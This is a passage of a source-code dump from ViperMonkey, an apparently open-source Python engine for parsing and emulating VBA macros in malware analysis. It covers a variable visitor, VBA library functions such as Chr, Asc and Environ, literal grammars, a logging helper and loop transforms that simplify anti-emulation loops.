mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | import sys 40 | 41 | from visitor import * 42 | import pyparsing 43 | 44 | class lhs_var_visitor(visitor): 45 | """ 46 | Get the LHS of all Let statements. 47 | """ 48 | 49 | def __init__(self): 50 | self.variables = set() 51 | self.visited = set() 52 | 53 | def visit(self, item): 54 | from statements import Let_Statement 55 | 56 | if (str(item) in self.visited): 57 | return False 58 | self.visited.add(str(item)) 59 | if ("Let_Statement" in str(type(item))): 60 | if (isinstance(item.name, str)): 61 | self.variables.add(item.name) 62 | elif (isinstance(item.name, pyparsing.ParseResults) and 63 | (item.name[0].lower().replace("$", "").replace("#", "").replace("%", "") == "mid")): 64 | self.variables.add(str(item.name[1])) 65 | 66 | return True 67 | -------------------------------------------------------------------------------- /vipermonkey/core/lib_functions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Library Functions 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | __version__ = '0.02' 41 | 42 | # --- IMPORTS ------------------------------------------------------------------ 43 | 44 | from curses_ascii import isprint 45 | import logging 46 | from pyparsing import * 47 | 48 | from vba_object import * 49 | from literals import * 50 | import vb_str 51 | 52 | from logger import log 53 | 54 | # --- VBA Expressions --------------------------------------------------------- 55 | 56 | # 5.6 Expressions 57 | # See below 58 | 59 | # any VBA expression: need to pre-declare using Forward() because it is recursive 60 | expression = Forward() 61 | 62 | # --- CHR -------------------------------------------------------------------- 63 | 64 | class Chr(VBA_Object): 65 | """ 66 | 6.1.2.11.1.4 VBA Chr function 67 | """ 68 | 69 | def __init__(self, original_str, location, tokens): 70 | super(Chr, self).__init__(original_str, location, tokens) 71 | # extract argument from the tokens: 72 | # Here the arg is expected to be either an int or a VBA_Object 73 | self.arg = tokens[0] 74 | if (log.getEffectiveLevel() == logging.DEBUG): 75 | log.debug('parsed %r as %s' % (self, self.__class__.__name__)) 76 | 77 | def to_python(self, context, params=None, indent=0): 78 | arg_str = to_python(self.arg, context) 79 | r = "core.vba_library.run_function(\"_Chr\", vm_context, [" + arg_str + "])" 80 | return r 81 | 82 | def return_type(self): 83 | return "STRING" 84 | 85 | def eval(self, context, params=None): 86 | 87 | # This is implemented in the common vba_library._Chr handler class. 88 | import vba_library 89 | chr_handler = vba_library._Chr() 90 | param = eval_arg(self.arg, context) 91 | return chr_handler.eval(context, [param]) 92 | 93 | def __repr__(self): 94 | return 'Chr(%s)' % repr(self.arg) 95 | 96 | # Chr, Chr$, ChrB, ChrW() 97 | chr_ = ( 98 | Suppress(Regex(re.compile('Chr[BW]?\$?', re.IGNORECASE))) 99 | + Suppress('(') 100 | + expression 101 | + Suppress(')') 102 | ) 103 | chr_.setParseAction(Chr) 104 | 105 | # --- ASC -------------------------------------------------------------------- 106 | 107 | class Asc(VBA_Object): 108 | """ 109 | VBA Asc function 110 | """ 111 | 112 | def __init__(self, original_str, location, tokens): 113 | super(Asc, self).__init__(original_str, location, tokens) 114 | 115 | # This could be a asc(...) call or a reference to a variable called asc. 116 | # If there are parsed arguments it is a call. 117 | self.arg = None 118 | if (len(tokens) > 0): 119 | # Here the arg is expected to be either a character or a VBA_Object 120 | self.arg = tokens[0] 121 | 122 | def to_python(self, context, params=None, indent=0): 123 | return "ord(" + to_python(self.arg, context) + ")" 124 | 125 | def return_type(self): 126 | return "INTEGER" 127 | 128 | def eval(self, context, params=None): 129 | 130 | # Are we just looking up a variable called 'asc'? 131 | if (self.arg is None): 132 | try: 133 | return context.get("asc") 134 | except KeyError: 135 | return "NULL" 136 | 137 | # Eval the argument. 138 | c = eval_arg(self.arg, context) 139 | 140 | # Don't modify the "**MATCH ANY**" special value. 141 | c_str = None 142 | try: 143 | c_str = str(c).strip() 144 | except UnicodeEncodeError: 145 | c_str = filter(isprint, c).strip() 146 | if (c_str == "**MATCH ANY**"): 147 | return c 148 | 149 | # Looks like Asc(NULL) is NULL? 150 | if (c == "NULL"): 151 | return 0 152 | 153 | # Calling Asc() on int? 154 | if (isinstance(c, int)): 155 | r = c 156 | else: 157 | 158 | # Got a string. 159 | 160 | # Should this match anything? 161 | if (c_str == "**MATCH ANY**"): 162 | r = "**MATCH ANY**" 163 | 164 | # This is an unmodified Asc() call. 165 | else: 166 | r = vb_str.get_ms_ascii_value(c_str) 167 | 168 | # Return the result. 169 | if (log.getEffectiveLevel() == logging.DEBUG): 170 | log.debug("Asc: return %r" % r) 171 | return r 172 | 173 | def __repr__(self): 174 | return 'Asc(%s)' % repr(self.arg) 175 | 176 | 177 | # Asc() 178 | # TODO: see MS-VBAL 6.1.2.11.1.1 page 240 => AscB, AscW 179 | asc = Suppress((CaselessKeyword('Asc') | CaselessKeyword('AscW'))) + Optional(Suppress('(') + expression + Suppress(')')) 180 | asc.setParseAction(Asc) 181 | 182 | # --- StrReverse() -------------------------------------------------------------------- 183 | 184 | class StrReverse(VBA_Object): 185 | """ 186 | VBA StrReverse function 187 | """ 188 | 189 | def __init__(self, original_str, location, tokens): 190 | super(StrReverse, self).__init__(original_str, location, tokens) 191 | # extract argument from the tokens: 192 | # Here the arg is expected to be either a string or a VBA_Object 193 | self.arg = tokens[0] 194 | 195 | def return_type(self): 196 | return "STRING" 197 | 198 | def eval(self, context, params=None): 199 | # return the string with all characters in reverse order: 200 | return eval_arg(self.arg, context)[::-1] 201 | 202 | def __repr__(self): 203 | return 'StrReverse(%s)' % repr(self.arg) 204 | 205 | # StrReverse() 206 | strReverse = Suppress(CaselessLiteral('StrReverse') + Literal('(')) + expression + Suppress(Literal(')')) 207 | strReverse.setParseAction(StrReverse) 208 | 209 | # --- ENVIRON() -------------------------------------------------------------------- 210 | 211 | class Environ(VBA_Object): 212 | """ 213 | VBA Environ function 214 | """ 215 | 216 | def __init__(self, original_str, location, tokens): 217 | super(Environ, self).__init__(original_str, location, tokens) 218 | # extract argument from the tokens: 219 | # Here the arg is expected to be either a string or a VBA_Object 220 | self.arg = tokens.arg 221 | 222 | def return_type(self): 223 | return "STRING" 224 | 225 | def eval(self, context, params=None): 226 | # return the environment variable name surrounded by % signs: 227 | # e.g. Environ("TEMP") => "%TEMP%" 228 | arg = eval_arg(self.arg, context=context) 229 | value = '%%%s%%' % arg 230 | if (log.getEffectiveLevel() == logging.DEBUG): 231 | log.debug('evaluating Environ(%s) => %r' % (arg, value)) 232 | return value 233 | 234 | def __repr__(self): 235 | return 'Environ(%s)' % repr(self.arg) 236 | 237 | # Environ("name") => just translated to "%name%", that is enough for malware analysis 238 | environ = Suppress(CaselessKeyword('Environ') + '(') + expression('arg') + Suppress(')') 239 | environ.setParseAction(Environ) 240 | -------------------------------------------------------------------------------- /vipermonkey/core/literals.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Literals 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | __version__ = '0.02' 41 | 42 | # --- IMPORTS ------------------------------------------------------------------ 43 | 44 | import logging 45 | import re 46 | 47 | from pyparsing import * 48 | 49 | from logger import log 50 | from vba_object import VBA_Object 51 | 52 | # --- BOOLEAN ------------------------------------------------------------ 53 | 54 | boolean_literal = Regex(re.compile('(True|False)', re.IGNORECASE)) 55 | boolean_literal.setParseAction(lambda t: bool(t[0].lower() == 'true')) 56 | 57 | # --- NUMBER TOKENS ---------------------------------------------------------- 58 | 59 | # 3.3.2 Number Tokens 60 | # 61 | # MS-GRAMMAR: INTEGER = integer-literal ["%" / "&" / "^"] 62 | # MS-GRAMMAR: integer-literal = decimal-literal / octal-literal / hex-literal 63 | # MS-GRAMMAR: decimal-literal = 1*decimal-digit 64 | # MS-GRAMMAR: octal-literal = "&" [%x004F / %x006F] 1*octal-digit ; & or &o or &O 65 | # MS-GRAMMAR: hex-literal = "&" (%x0048 / %x0068) 1*hex-digit; &h or &H 66 | # MS-GRAMMAR: octal-digit = "0" / "1" / "2" / "3" / "4" / "5" / "6" / "7" 67 | # MS-GRAMMAR: decimal-digit = octal-digit / "8" / "9" 68 | # MS-GRAMMAR: hex-digit = decimal-digit / %x0041-0046 / %x0061-0066 ;A-F / a-f 69 | 70 | # here Combine() is required to avoid spaces between elements: 71 | decimal_literal = Regex(re.compile('(?P[+\-]?\d+)[%&^]?[!#@]?')) 72 | decimal_literal.setParseAction(lambda t: int(t.value)) 73 | 74 | octal_literal = Regex(re.compile('&o?(?P[0-7]+)[%&^]?', re.IGNORECASE)) 75 | octal_literal.setParseAction(lambda t: int(t.value, base=8)) 76 | 77 | hex_literal = Regex(re.compile('&h(?P[0-9a-f]+)[%&^]?', re.IGNORECASE)) 78 | hex_literal.setParseAction(lambda t: int(t.value, base=16)) 79 | 80 | integer = decimal_literal | octal_literal | hex_literal 81 | 82 | # MS-GRAMMAR: decimal_int = (WordStart(alphanums) + Word(nums)) 83 | # MS-GRAMMAR: decimal_int.setParseAction(lambda t: int(t[0])) 84 | # 85 | # NOTE: here WordStart is to avoid matching a number preceded by letters (e.g. "VBT1"), when using scanString 86 | # TO DO: remove WordStart if scanString is not used 87 | 88 | # MS-GRAMMAR: FLOAT = (floating-point-literal [floating-point-type-suffix] ) / (decimal-literal floating- 89 | # MS-GRAMMAR: point-type-suffix) 90 | # MS-GRAMMAR: floating-point-literal = (integer-digits exponent) / (integer-digits "." [fractional-digits] 91 | # MS-GRAMMAR: [exponent]) / ( "." fractional-digits [exponent]) 92 | # MS-GRAMMAR: integer-digits = decimal-literal 93 | # MS-GRAMMAR: fractional-digits = decimal-literal 94 | # MS-GRAMMAR: exponent = exponent-letter [sign] decimal-literal 95 | # MS-GRAMMAR: exponent-letter = %x0044 / %x0045 / %x0064 / %x0065 96 | # MS-GRAMMAR: floating-point-type-suffix = "!" / "#" / "@" 97 | 98 | float_literal = Regex(re.compile('(?P[+\-]?\d+\.\d*([eE][+\-]?\d+)?)[!#@]?')) | \ 99 | Regex(re.compile('(?P[+\-]?\d+[eE][+\-]?\d+)[!#@]?')) 100 | float_literal.setParseAction(lambda t: float(t.value)) 101 | # --- QUOTED STRINGS --------------------------------------------------------- 102 | 103 | # 3.3.4 String Tokens 104 | # 105 | # MS-GRAMMAR: STRING = double-quote *string-character (double-quote / line-continuation / LINE-END) 106 | # MS-GRAMMAR: double-quote = %x0022 ; " 107 | # MS-GRAMMAR: string-character = NO-LINE-CONTINUATION ((double-quote double-quote) termination-character) 108 | 109 | class String(VBA_Object): 110 | 111 | def __init__(self, original_str, location, tokens): 112 | super(String, self).__init__(original_str, location, tokens) 113 | self.value = tokens[0] 114 | if (log.getEffectiveLevel() == logging.DEBUG): 115 | log.debug('parsed "%r" as String' % self) 116 | 117 | def __repr__(self): 118 | return '"' + str(self.value) + '"' 119 | 120 | def eval(self, context, params=None): 121 | r = self.value 122 | if (log.getEffectiveLevel() == logging.DEBUG): 123 | log.debug("String.eval: return " + r) 124 | return r 125 | 126 | def to_python(self, context, params=None, indent=0): 127 | # Escape some characters. 128 | r = str(self.value).\ 129 | replace("\\", "\\\\").\ 130 | replace('"', '\\"').\ 131 | replace("\n", "\\n").\ 132 | replace("\t", "\\t").\ 133 | replace("\r", "\\r") 134 | for i in range(0, 9): 135 | repl = hex(i).replace("0x", "") 136 | if (len(repl) == 1): 137 | repl = "0" + repl 138 | repl = "\\x" + repl 139 | r = r.replace(chr(i), repl) 140 | for i in range(11, 13): 141 | repl = hex(i).replace("0x", "") 142 | if (len(repl) == 1): 143 | repl = "0" + repl 144 | repl = "\\x" + repl 145 | r = r.replace(chr(i), repl) 146 | for i in range(14, 32): 147 | repl = hex(i).replace("0x", "") 148 | if (len(repl) == 1): 149 | repl = "0" + repl 150 | repl = "\\x" + repl 151 | r = r.replace(chr(i), repl) 152 | for i in range(127, 255): 153 | repl = hex(i).replace("0x", "") 154 | if (len(repl) == 1): 155 | repl = "0" + repl 156 | repl = "\\x" + repl 157 | r = r.replace(chr(i), repl) 158 | return '"' + r + '"' 159 | 160 | # NOTE: QuotedString creates a regex, so speed should not be an issue. 161 | #quoted_string = (QuotedString('"', escQuote='""') | QuotedString("'", escQuote="''"))('value') 162 | quoted_string = QuotedString('"', escQuote='""', convertWhitespaceEscapes=False)('value') 163 | quoted_string.setParseAction(String) 164 | 165 | quoted_string_keep_quotes = QuotedString('"', escQuote='""', unquoteResults=False, convertWhitespaceEscapes=False) 166 | quoted_string_keep_quotes.setParseAction(lambda t: str(t[0])) 167 | 168 | # --- DATE TOKENS ------------------------------------------------------------ 169 | 170 | # TODO: 3.3.3 Date Tokens 171 | # 172 | # MS-GRAMMAR: DATE = "#" *WSC [date-or-time *WSC] "#" 173 | # MS-GRAMMAR: date-or-time = (date-value 1*WSC time-value) / date-value / time-value 174 | # MS-GRAMMAR: date-value = left-date-value date-separator middle-date-value [date-separator right-date- 175 | # value] 176 | # MS-GRAMMAR: left-date-value = decimal-literal / month-name 177 | # MS-GRAMMAR: middle-date-value = decimal-literal / month-name 178 | # MS-GRAMMAR: right-date-value = decimal-literal / month-name 179 | # MS-GRAMMAR: date-separator = 1*WSC / (*WSC ("/" / "-" / ",") *WSC) 180 | # MS-GRAMMAR: month-name = English-month-name / English-month-abbreviation 181 | # MS-GRAMMAR: English-month-name = "january" / "february" / "march" / "april" / "may" / "june" / "august" / "september" / "october" / "november" / "december" 182 | # MS-GRAMMAR: English-month-abbreviation = "jan" / "feb" / "mar" / "apr" / "jun" / "jul" / "aug" / "sep" / "oct" / "nov" / "dec" 183 | # MS-GRAMMAR: time-value = (hour-value ampm) / (hour-value time-separator minute-value [time-separator 184 | # MS-GRAMMAR: second-value] [ampm]) 185 | # MS-GRAMMAR: hour-value = decimal-literal 186 | # MS-GRAMMAR: minute-value = decimal-literal 187 | # MS-GRAMMAR: second-value = decimal-literal 188 | # MS-GRAMMAR: time-separator = *WSC (":" / ".") *WSC 189 | # MS-GRAMMAR: ampm = *WSC ("am" / "pm" / "a" / "p") 190 | 191 | # TODO: For now just handle a date literal as a string. 192 | date_string = QuotedString('#') 193 | date_string.setParseAction(lambda t: str(t[0])) 194 | 195 | # --- LITERALS --------------------------------------------------------------- 196 | 197 | # TODO: 5.6.5 Literal Expressions 198 | 199 | literal = boolean_literal | integer | quoted_string | date_string | float_literal 200 | literal.setParseAction(lambda t: t[0]) 201 | 202 | -------------------------------------------------------------------------------- /vipermonkey/core/logger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | vipermonkey logging helper 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer. 25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | 41 | # ------------------------------------------------------------------------------ 42 | # CHANGELOG: 43 | # 2015-02-12 v0.01 PL: - first prototype 44 | # 2015-2016 PL: - many updates 45 | # 2016-06-11 v0.02 PL: - split vipermonkey into several modules 46 | 47 | __version__ = '0.08' 48 | 49 | # ------------------------------------------------------------------------------ 50 | # TODO: 51 | 52 | # --- IMPORTS ------------------------------------------------------------------ 53 | 54 | import logging 55 | 56 | # === LOGGING ================================================================= 57 | 58 | class CappedFileHandler(logging.FileHandler): 59 | 60 | # default size cap of 30M 61 | # log file is put in the working directory with the same name 62 | def __init__(self, filename, sizecap, mode='w', encoding=None, delay=False): 63 | self.size_cap = sizecap 64 | self.current_size = 0 65 | self.cap_exceeded = False 66 | super(CappedFileHandler, self).__init__(filename, mode, encoding, delay) 67 | 68 | def emit(self, record): 69 | if not self.cap_exceeded: 70 | new_size = self.current_size + len(self.formatter.format(record)) 71 | if new_size <= self.size_cap: 72 | self.current_size = new_size 73 | super(CappedFileHandler, self).emit(record) 74 | # regardless of whether or not a future log could be within the size cap, cut it off here 75 | else: 76 | self.cap_exceeded = True 77 | 78 | class DuplicateFilter(logging.Filter): 79 | 80 | def filter(self, record): 81 | # add other fields if you need more granular comparison, depends on your app 82 | current_log = (record.module, record.levelno, record.msg) 83 | if current_log != getattr(self, "last_log", None): 84 | self.last_log = current_log 85 | return True 86 | return False 87 | 88 | def get_logger(name, level=logging.NOTSET): 89 | """ 90 | Create a suitable logger object for this module. 91 | The goal is not to change settings of the root logger, to avoid getting 92 | other modules' logs on the screen. 93 | If a logger exists with same name, reuse it. (Else it would have duplicate 94 | handlers and messages would be doubled.) 95 | """ 96 | # First, test if there is already a logger with the same name, else it 97 | # will generate duplicate messages (due to duplicate handlers): 98 | if name in logging.Logger.manager.loggerDict: 99 | # NOTE: another less intrusive but more "hackish" solution would be to 100 | # use getLogger then test if its effective level is not default. 101 | logger = logging.getLogger(name) 102 | # make sure level is OK: 103 | logger.setLevel(level) 104 | # Skip duplicate log messages. 105 | logger.addFilter(DuplicateFilter()) 106 | return logger 107 | # get a new logger: 108 | logger = logging.getLogger(name) 109 | # only add a NullHandler for this logger, it is up to the application 110 | # to configure its own logging: 111 | logger.addHandler(logging.NullHandler()) 112 | logger.setLevel(level) 113 | # Skip duplicate log messages. 114 | logger.addFilter(DuplicateFilter()) 115 | return logger 116 | 117 | 118 | # a global logger object used for debugging: 119 | log = get_logger('VMonkey') 120 | 121 | -------------------------------------------------------------------------------- /vipermonkey/core/loop_transform.py: -------------------------------------------------------------------------------- 1 | """ 2 | loop_transform.py - Transform certain types of loops into easier to emulate constructs. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | #=== LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | import logging 40 | import re 41 | 42 | from logger import log 43 | import statements 44 | 45 | def _transform_dummy_loop1(loop): 46 | """ 47 | Transform useless loops like 'y = 20:Do While x < 100:If x = 6 Then y = 30:x = x + 1:Loop' to 48 | 'y = 30' 49 | """ 50 | 51 | # Do we have this sort of loop? 52 | loop_pat = r"Do\s+While\s+(\w+)\s*<\s*(\d+)\r?\n.{0,500}?Loop" 53 | loop_str = loop.original_str 54 | if (re.search(loop_pat, loop_str, re.DOTALL) is None): 55 | return loop 56 | 57 | # Pull out the loop variable and loop upper bound. 58 | info = re.findall(loop_pat, loop_str, re.DOTALL) 59 | loop_var = info[0][0].strip() 60 | loop_ub = int(info[0][1].strip()) 61 | 62 | # Pull out all the if statements that check to see if a variable is equal to 63 | # an integer constant. 64 | if_pat = r"If\s+\(?\s*(\w+)\s*=\s*(\d+)\s*\)\s+Then\s*\r?\n?(.{10,200}?)End\s+If" 65 | if_info = re.findall(if_pat, loop_str, re.DOTALL) 66 | if (len(if_info) == 0): 67 | return loop 68 | 69 | # Find all the if statements that will be taken if the loop runs to 70 | # completion. 71 | run_statements = [] 72 | for curr_if in if_info: 73 | 74 | # Get the variable being tested. 75 | test_var = curr_if[0].strip() 76 | 77 | # Get the value it's being checked against. 78 | test_val = int(curr_if[1].strip()) 79 | 80 | # Are we checking the loop variable? 81 | if (test_var != loop_var): 82 | continue 83 | 84 | # Is the value being checked less that the loop upper bound? 85 | if (test_val >= loop_ub): 86 | continue 87 | 88 | # The test will eventually succeed. Save the statement being executed. 89 | run_statement = curr_if[2].strip() 90 | if (run_statement.endswith("Else")): 91 | run_statement = run_statement[:-len("Else")] 92 | run_statements.append(run_statement) 93 | 94 | # Did we find some things that are guarenteed to run in the loop? 95 | if (len(run_statements) == 0): 96 | return loop 97 | 98 | # We have simple if-statements that will always execute in the loop. 99 | # Assume that this loop is only here to foil emulation and replace it with 100 | # the statements that will slways run from the loop. 101 | loop_repl = "" 102 | for run_statement in run_statements: 103 | loop_repl += run_statement + "\n" 104 | 105 | # Parse and return the loop replacement, if it works. 106 | import statements 107 | try: 108 | obj = statements.statement_block.parseString(loop_repl, parseAll=True)[0] 109 | except: 110 | return loop 111 | return obj 112 | 113 | def _transform_wait_loop(loop): 114 | """ 115 | Transform useless loops like 'Do While x <> y:SomeFunctionCall():Loop' to 116 | 'SomeFunctionCall()' 117 | """ 118 | 119 | # Do we have this sort of loop? 120 | loop_pat = r"[Ww]hile\s+\w+\s*<>\s*\"?\w+\"?\r?\n.{0,500}?[Ww]end" 121 | loop_str = loop.original_str 122 | if (re.search(loop_pat, loop_str, re.DOTALL) is None): 123 | return loop 124 | 125 | # Is the loop body a function call? 126 | if ((len(loop.body) > 1) or (len(loop.body) == 0) or 127 | (not isinstance(loop.body[0], statements.Call_Statement))): 128 | return loop 129 | 130 | # Just do the call once. 131 | log.warning("Transformed possible infinite wait loop...") 132 | return loop.body[0] 133 | 134 | def transform_loop(loop): 135 | """ 136 | Transform a given VBAObject representing a loop into an easier to emulate construct. 137 | """ 138 | 139 | # Sanity check. 140 | import statements 141 